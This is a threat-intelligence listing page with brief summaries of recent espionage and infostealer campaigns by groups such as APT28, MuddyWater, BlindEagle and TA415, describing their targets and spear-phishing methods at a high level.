Threat Research

APT28, a Russian state-sponsored threat group also known as Fancy Bear or UAC-0001, is conducting a sophisticated espionage campaign against European military and government entities. The operation primarily targets maritime and transportation organizations in Poland, Slovenia, Turkey, Greece, the UAE, and Ukraine....

The Muddy Water APT has launched a spearphishing campaign targeting diplomatic, maritime, financial, and telecom sectors across the Middle East, delivering malicious Word documents with icon spoofing....

BlindEagle launched a spear-phishing campaign targeting a Colombian government agency under the Ministry of Commerce, Industry and Tourism (MCIT), using emails sent from a compromised internal account to bypass security controls....

UNC1549 often gained initial access by blending targeted social engineering with the use of compromised third-party accounts. Using credentials stolen from vendors or partners, the group took advantage of legitimate trust relationships to enter victim environments....

Silent Lynx is an espionage-driven APT group known for spear-phishing campaigns impersonating government officials to target Central Asian, Russian, and Southeast Asian entities. Recent analysis shows the group’s slow tactical evolution, using fake RAR archives and malicious .NET implants, while making operational errors that exposed new infrastructure....

Between July and August 2025, TA415 conducted spearphishing campaigns targeting U.S. government, think tanks, and academic institutions using U.S.-China economic-themed lures. The group impersonated prominent entities like the Select Committee on Strategic Competition and the US-China Business Council to target individuals focused on U.S.-China relations....

The Gonepostal malware has been observed in an espionage campaign linked to KTA007 (aka Fancy Bear/APT28), a Russian state-sponsored group tied to GRU Unit 26165. The malware consists of a dropper DLL and a password-protected Outlook macro file (VbaProject.OTM) that enables backdoor access via email-based C2....

A research center uncovered a DPRK-linked espionage campaign targeting diplomatic missions in South Korea in early 2025. Between March and July, at least 19 spear-phishing attacks impersonated trusted contacts to lure embassy staff. Attackers used GitHub for covert C2 communications and cloud platforms like Dropbox to deliver XenoRAT malware....

On May 15th, email security tools detected a sophisticated spear-phishing campaign targeting CFOs and finance executives at banks, energy firms, insurance companies, and investment groups across Europe, Africa, Canada, the Middle East, and South Asia. This multi-stage attack aimed to deliver NetBird, a legitimate WireGuard-based remote access tool, onto victims’ systems....

LummaC2 is an infostealer malware targeting critical U.S. infrastructure sectors, active from November 2023 to May 2025. It spreads via spearphishing emails containing fake CAPTCHAs that trick users into running PowerShell commands. The malware is often embedded in spoofed software and first emerged on Russian-speaking forums in 2022....